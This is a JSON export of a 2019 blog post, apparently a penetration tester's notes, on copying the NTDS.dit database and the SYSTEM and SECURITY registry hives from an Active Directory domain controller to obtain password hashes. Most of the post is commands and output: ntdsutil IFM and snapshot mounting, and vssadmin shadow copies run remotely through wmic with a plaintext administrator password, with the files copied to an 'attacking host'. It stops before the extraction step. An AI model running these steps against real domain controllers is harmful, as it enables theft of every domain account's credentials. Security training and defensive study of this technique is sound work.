{"id":1218,"date":"2019-01-07T16:28:24","date_gmt":"2019-01-07T22:28:24","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?p=1218"},"modified":"2019-01-07T18:28:46","modified_gmt":"2019-01-08T00:28:46","slug":"obtaining-domain-controller-password-hashes","status":"publish","type":"post","link":"https:\/\/www.jedge.com\/wordpress\/2019\/01\/obtaining-domain-controller-password-hashes\/","title":{"rendered":"Obtaining Domain Controller Password Hashes"},"content":{"rendered":"

I have referred to the following bookmarked URL in the past as a reminder on how to easily obtain the NTDS.dit and SYSTEM registry for analysis.
\nObtaining NTDS.Dit Using In-Built Windows Commands<\/strong>
\nhttps:\/\/www.cyberis.co.uk\/2014\/02\/obtaining-ntdsdit-using-in-built.html<\/a>
\nI revisit this URL and document additional ways to obtain NTDS.dit and the Windows Registry files but also how to extract the password hashes. Additional methods on obtaining the password hashes from the Domain Controller will also be listed.
\n
\nOne item I would change about the commands provided is I would combine them to run as one long command

\nC:\\ntdsutil \u201cactivate instance ntds\u201d ifm \u201ccreate full c:\\temp\u201d quit quit\n<\/code><\/pre>
\nThis would place a backup of the NTDS.dit and the SYSTEM and SECURITY registry files in C:\\temp\\Active Directory<\/kbd> and C:\\temp\\registry<\/kbd><\/p>\n
From this bookmark I will document all the ways I have obtained the password hashes from a Domain Controller.
\nMore ntdsutil<\/strong>
\nYou can use ntdsutil to determine if there has been a previous snapshot created. If a snapshot exists then the shadow volume can be mounted and the NTDS.dit and registry files copied.
C:\\Users\\Administrator>ntdsutil snapshot "list all"\nntdsutil: snapshot\nsnapshot: list all\n 1: 2019\/01\/02:21:40 {ff29f1b4-5dac-41cd-a592-10c553595a95}\n 2:   C: {29e45139-0e71-47eb-a48f-2e6848d05908}<\/code><\/pre>Lets query the registry to identify where NTDS.dit is located.  Then mount the snapshot and copy NTDS.dit and the system’s registry files.
C:\\Users\\Administrator>reg query hklm\\system\\currentcontrolset\\services\\ntds\\parameters\n\nHKEY_LOCAL_MACHINE\\system\\currentcontrolset\\services\\ntds\\parameters\n. . . SNIP . . .\nName,CN=Sites,CN=Configuration,DC=corp,DC=jedge,DC=com\n    DsaOptions    REG_SZ    1\n    DSA Working Directory    REG_SZ    C:\\Windows\\NTDS\n    DSA Database file    REG_SZ    C:\\Windows\\NTDS\\ntds.dit\n    Database backup path    REG_SZ    C:\\Windows\\NTDS\\dsadata.bak\n. . . SNIP . . .\n\nC:\\Users\\Administrator>ntdsutil snapshot "mount {29e45139-0e71-47eb-a48f-2e6848d05908}"\nntdsutil: snapshot\nsnapshot: mount {29e45139-0e71-47eb-a48f-2e6848d05908}\nSnapshot {29e45139-0e71-47eb-a48f-2e6848d05908} mounted as C:\\$SNAP_201901022140_VOLUMEC$\\\n\nC:\\Users\\Administrator>copy C:\\$SNAP_201901022140_VOLUMEC$\\Windows\\NTDS\\ntds.dit c:\\temp\\ntds.dit\n        1 file(s) copied.\n\nC:\\Users\\Administrator>copy C:\\$SNAP_201901022140_VOLUMEC$\\Windows\\System32\\Config\\SYSTEM c:\\temp\\SYSTEM\n        1 file(s) copied.\n\nC:\\Users\\Administrator>copy C:\\$SNAP_201901022140_VOLUMEC$\\Windows\\System32\\Config\\SECURITY c:\\temp\\SECURITY\n        1 file(s) copied.\n<\/code><\/pre>
\nVSSADMIN over WMIC<\/strong><\/p>\n
https:\/\/docs.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/vssadmin<\/a>
\nhttps:\/\/docs.microsoft.com\/en-us\/windows\/desktop\/wmisdk\/wmic<\/a>
\nWe will need to read the output of the WMIC commands and access the files we copy from the shadow volumn so we mount the Domain Controller hard disk and create a temp folder.
C:\\Users\\Administrator>net use \\\\192.168.50.10\\C$ "Password5" \/u:CORP\\administrator\nThe command completed successfully.\n\nC:\\Users\\Administrator>mkdir \\\\192.168.50.10\\C$\\temp\nA subdirectory or file \\\\192.168.50.10\\C$\\temp already exists.<\/code><\/pre>
\nWe use the WMIC command to identify any existing shadow volumns or create our own so we can copy the NTDS.dit and registry files to the temp folder where we can transfer them to our workstation.
C:\\Users\\Administrator>wmic \/node:192.168.50.10 \/user:CORP\\Administrator \/password:Password5 process call create "cmd \/c vssadmin list shadows 2>&1 > C:\\temp\\checkshadow.txt"\nExecuting (Win32_Process)->Create()\nMethod execution successful.\nOut Parameters:\ninstance of __PARAMETERS\n{\n        ProcessId = 2568;\n        ReturnValue = 0;\n};\n\nC:\\Users\\Administrator>type \\\\192.168.50.10\\C$\\temp\\checkshadow.txt\nvssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n(C) Copyright 2001-2005 Microsoft Corp.\n\nContents of shadow copy set ID: {ff29f1b4-5dac-41cd-a592-10c553595a95}\n   Contained 1 shadow copies at creation time: 1\/2\/2019 9:40:13 PM\n      Shadow Copy ID: {29e45139-0e71-47eb-a48f-2e6848d05908}\n         Original Volume: (C:)\\\\?\\Volume{874968c4-ed3a-11e6-bee8-806e6f6e6963}\\\n         Shadow Copy Volume: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n         Originating Machine: WIN-PJ59SLGOBUG.corp.jedge.com\n         Service Machine: WIN-PJ59SLGOBUG.corp.jedge.com\n         Provider: 'Microsoft Software Shadow Copy provider 1.0'\n         Type: ApplicationRollback\n         Attributes: Persistent, No auto release, Differential, Exposed locally,\n Auto recovered\n<\/code><\/pre>We have a recent shadow file.  If we did not have a file we would use vssadmin to create one.
C:\\Users\\Administrator>wmic \/node:192.168.50.10 \/user:CORP\\Administrator \/password:Password5 process call create "cmd \/c vssadmin create shadow \/for=C: 2>&1 > C:\\temp\\output.txt"\nExecuting (Win32_Process)->Create()\nMethod execution successful.\nOut Parameters:\ninstance of __PARAMETERS\n{\n        ProcessId = 2564;\n        ReturnValue = 0;\n};\n\nC:\\Users\\Administrator>type \\\\192.168.50.10\\C$\\temp\\output.txt\nvssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n(C) Copyright 2001-2005 Microsoft Corp.\n\nSuccessfully created shadow copy for 'C:\\'\n    Shadow Copy ID: {3a6b62ff-3e5c-4b86-868c-2e26355d490a}\n    Shadow Copy Volume Name: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2<\/code><\/pre>We will work with the latest shadow volumn we just created. We will copy the files to the C:\\temp folder which we have already mounted on the attacking host.  From there we can copy them to the host for analysis.\t
C:\\Users\\Administrator>wmic \/node:192.168.50.10 \/user:CORP\\Administrator \/password:Password5 process call create "cmd \/c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\\config\\SYSTEM C:\\temp\\SYSTEM.hive 2>&1 > C:\\temp\\output.txt"\nExecuting (Win32_Process)->Create()\nMethod execution successful.\nOut Parameters:\ninstance of __PARAMETERS\n{\n        ProcessId = 1248;\n        ReturnValue = 0;\n};\n\nC:\\Users\\Administrator>wmic \/node:192.168.50.10 \/user:CORP\\Administrator \/password:Password5 process call create "cmd \/c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\\config\\SECURITY C:\\temp\\SECURITY.hive 2>&1 > C:\\temp\\output.txt"\nExecuting (Win32_Process)->Create()\nMethod execution successful.\nOut Parameters:\ninstance of __PARAMETERS\n{\n        ProcessId = 232;\n        ReturnValue = 0;\n};\n\nC:\\Users\\Administrator>wmic \/node:192.168.50.10 \/user:CORP\\Administrator \/password:Password5 process call create "cmd \/c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy45\\Windows\\NTDS\\NTDS.dit C:\\temp\\NTDS.dit 2>&1 > C:\\temp\\output.txt"\n\nExecuting (Win32_Process)->Create()\nMethod execution successful.\nOut Parameters:\ninstance of __PARAMETERS\n{\n        ProcessId = 1804;\n        ReturnValue = 0;\n};\n\nC:\\Users\\Administrator>dir \\\\192.168.50.10\\C$\\temp\n Volume in drive \\\\192.168.50.10\\C$ has no label.\n Volume Serial Number is 54AC-A84F\n\n Directory of \\\\192.168.50.10\\C$\\temp\n\n01\/07\/2019  02:15 PM    <DIR>          .\n01\/07\/2019  02:15 PM    <DIR>          ..\n01\/07\/2019  01:57 PM               801 checkshadow.txt\n01\/02\/2019  09:40 PM        16,793,600 ntds.dit\n01\/07\/2019  02:14 PM                44 output.txt\n01\/03\/2019  05:56 PM           262,144 SECURITY.hive\n01\/07\/2019  02:05 PM         8,650,752 SYSTEM.hive\n               5 File(s)     25,707,341 bytes\n               2 Dir(s)  12,779,933,696 bytes free<\/code><\/pre><\/p>\n
to be continued . . .<\/p>\n","protected":false},"excerpt":{"rendered":"
I have referred to the following bookmarked URL in the past as a reminder on how to easily obtain the NTDS.dit and SYSTEM registry for analysis. Obtaining NTDS.Dit Using In-Built Windows Commands https:\/\/www.cyberis.co.uk\/2014\/02\/obtaining-ntdsdit-using-in-built.html I revisit this URL and document additional ways to obtain NTDS.dit and the Windows Registry files but also how to extract the […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[167,163],"tags":[182,179,180,181],"class_list":["post-1218","post","type-post","status-publish","format-standard","hentry","category-bookmarks","category-hacking","tag-ntds-dit","tag-ntdsutil","tag-vssadmin","tag-wmic"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1218","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=1218"}],"version-history":[{"count":5,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1218\/revisions"}],"predecessor-version":[{"id":1224,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/1218\/revisions\/1224"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=1218"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/categories?post=1218"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/tags?post=1218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}